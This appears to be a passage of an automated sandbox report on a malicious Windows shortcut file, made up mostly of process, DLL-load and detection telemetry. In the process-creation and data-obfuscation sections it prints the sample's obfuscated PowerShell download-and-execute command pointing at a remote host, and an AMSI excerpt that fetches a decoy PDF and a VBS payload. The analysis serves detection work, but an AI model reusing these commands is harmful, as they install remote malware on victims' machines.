      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: FjfZ7uM8zh.lnkVirustotal: Detection: 24%
      Source: FjfZ7uM8zh.lnkReversingLabs: Detection: 28%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing'))
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1644,i,621958559739695551,17562873366467030147,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1644,i,621958559739695551,17562873366467030147,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: FjfZ7uM8zh.lnkLNK file: ..\..\..\..\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: \mscorlib.pdbpdblib.pdbu source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1613639617.000001511151A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbe35 source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1613639617.000001511151A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1710540369.000001512B8FA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000003.00000002.1533236480.00000217BF569000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1533236480.00000217BF50B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb5 source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000001.00000002.1710540369.000001512B92F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb} source: powershell.exe, 00000001.00000002.1710540369.000001512B92F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1533236480.00000217BF569000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000001.00000002.1710540369.000001512B92F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbG source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1710540369.000001512B97D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1613639617.000001511151A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.1710540369.000001512B92F000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${t8ispk} = $PSHOME;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'A' + ${t8ispk}[-66 +55];${wna.} = $([TYPE]${*wff6sn.});${*.hqpoqw.} = ${wna.}::ToString(+79 -1 -5)+${wna.}::ToString(+79 -1 -5 -4)+${wna.}::ToString(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -UseBasicParsing'))
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AFB00BD pushad ; iretd 1_2_00007FFB4AFB00C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4AFA00BD pushad ; iretd 3_2_00007FFB4AFA00C1

      Persistence and Installation Behavior

      barindex
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior

      Boot Survival

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htpovwww.astd1dntd1drprisd1ds.com.pk/ms/List%20of%20rd1dquird1dd%20itd1dms%20and%20sd1drvicd1ds.pdf';getit -fz $flol -oulv 'http://www.blud1dmaxxlasd1dr.com/ms/ms.vbs';exit[Environment]::GetEnvironmentVariable('public') + '\\dmb.vbs'@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin", "Get-Clipboard", "Set-Clipboard", "Get-ComputerInfo", 